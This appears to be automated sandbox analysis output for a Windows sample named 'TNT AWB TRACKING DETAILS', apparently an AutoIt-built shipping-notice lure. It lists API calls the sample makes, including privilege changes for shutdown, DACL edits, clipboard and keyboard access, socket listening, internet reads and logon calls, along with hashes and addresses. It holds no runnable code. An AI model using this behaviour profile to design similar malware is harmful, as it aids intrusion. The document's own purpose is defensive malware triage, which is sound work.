                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                      • GetLastError.KERNEL32 ref: 00433414
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 2938487562-3733053543
                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                      APIs
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1255039815-0
                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                      APIs
                                      • __swprintf.LIBCMT ref: 00433073
                                      • __swprintf.LIBCMT ref: 00433085
                                      • __wcsicoll.LIBCMT ref: 00433092
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                      • LockResource.KERNEL32(?), ref: 00433120
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                      • String ID:
                                      • API String ID: 1158019794-0
                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_strncmp
                                      • String ID: @oH$\$^$h
                                      • API String ID: 2175499884-3701065813
                                      • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                      • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                      • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                      • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                      • API String ID: 0-2872873767
                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                      • __wsplitpath.LIBCMT ref: 00475644
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00475657
                                      • __wcsicoll.LIBCMT ref: 0047567B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 2547909840-0
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                      • FindClose.KERNEL32(?), ref: 004525FF
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                      • String ID: *.*$\VH
                                      • API String ID: 2786137511-2657498754
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: pqI
                                      • API String ID: 2579439406-2459173057
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00433349
                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                      • __wcsicoll.LIBCMT ref: 00433375
                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                      Similarity
                                      • API ID: __wcsicollmouse_event
                                      • String ID: DOWN
                                      • API String ID: 1033544147-711622031
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                      Similarity
                                      • API ID: KeyboardMessagePostState$InputSend
                                      • String ID:
                                      • API String ID: 3031425849-0
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • IsWindowVisible.USER32 ref: 0047A368
                                      • IsWindowEnabled.USER32 ref: 0047A378
                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                      • IsIconic.USER32 ref: 0047A393
                                      • IsZoomed.USER32 ref: 0047A3A1
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      APIs
                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                      • CloseClipboard.USER32 ref: 0046DD0D
                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                      • CloseClipboard.USER32 ref: 0046DD41
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                      • CloseClipboard.USER32 ref: 0046DD99
                                      Similarity
                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                      • String ID:
                                      • API String ID: 15083398-0
                                      APIs
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: U$\
                                      • API String ID: 4104443479-100911408
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Similarity
                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 901099227-0
                                      APIs
                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                      Similarity
                                      • API ID: Proc
                                      • String ID:
                                      • API String ID: 2346855178-0
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      APIs
                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: N@
                                      • API String ID: 0-1509896676
                                      APIs
                                      • DeleteObject.GDI32(?), ref: 0045953B
                                      • DeleteObject.GDI32(?), ref: 00459551
                                      • DestroyWindow.USER32(?), ref: 00459563
                                      • GetDesktopWindow.USER32 ref: 00459581
                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                      • _wcslen.LIBCMT ref: 00459916
                                      • _wcscpy.LIBCMT ref: 0045993A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                      • GetDC.USER32(00000000), ref: 004599FC
                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                      Strings
                                      Similarity
                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 4040870279-2373415609
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                      • SelectObject.GDI32(?,?), ref: 00441874
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                      • DeleteObject.GDI32(?), ref: 004418D5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                      • FillRect.USER32(?,?,?), ref: 00441970
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
